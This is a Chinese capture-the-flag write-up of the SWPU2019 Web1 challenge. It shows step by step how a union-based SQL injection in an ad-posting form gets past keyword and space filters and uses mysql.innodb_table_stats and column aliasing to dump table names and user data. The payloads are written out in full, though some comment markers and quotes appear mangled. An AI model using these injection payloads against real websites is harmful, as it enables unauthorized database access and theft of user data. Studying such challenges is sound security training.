[SWPU2019]Web1(sql)

原来我们学校之前的一道很有意思的sql题目

刚好最近在学手注(之前直接sqlmap一把梭)

拿来练练手

a9e4556f75544a4fb4e566e734f9cbd4.png

按照流程先注册账号,现在还不能判断是sql注入

33185b09b9e342febafdfa7c5a0651fc.png

发布个广告试试

6266467e8aa44ea2a97e32ea25c8ddd1.png

此时还不知道是什么意思

发布一个试试

4a8ed3c9ba144f8a917f9c3b7f5534e9.png

看到这里就很明显了,发布这个广告的过程就存在sql注入

7ad2adfcb67740739085d60685777689.png

多次尝试,发现是因为里面含有过滤词,过滤了or # –+和空格

空格可以用/**/来代替

–+注释符的话就用单引号闭合就ok了

or被过滤了的话就不能使用order by,information_schema

 

先联合注入检查列数

-1’union//select//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′

4c182a8c17cf436cb2d994af6cb12d0d.png

2,3位有回显

那就拿database()去占位爆数据库

1’//union//select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′

c73cc2864ad04970a28d8cec4cf22257.png

爆表名,这里不能使用or,所以这里使用的是新的payload

1’//union//select//1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22//from//mysql.innodb_table_stats//where/**/database_name=”web1″‘

因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。(select//group_concat(table_name)//from//mysql.innodb_table_stats//where/**/database_name=database())

payload:-1’//union//select//1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22//from//mysql.innodb_table_stats//where/**/database_name=”web1″‘

fc0ba987f7104b128263a8c47841ea28.png

这里存在一个问题我们只知道Innodb的表名和数据库名,列名不知道。

这里有一个语法可以在不知道原列名 的情况下查询特定的列名–我们自己定义名字

我们可以给表修改列名,只要知道表的具体列数;1,2,3 as a 注:第二种只把最后一项3替换为`a`

select `5` from (select 1,2,3,4,5 union select * from t2)a;

等价于

select b from (select 1,2,3,4,5 as b union select * from t2)a;

 

最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select////from/*/users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′

8083db382b87456c9e778ea6c7955b2c.png

 

  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值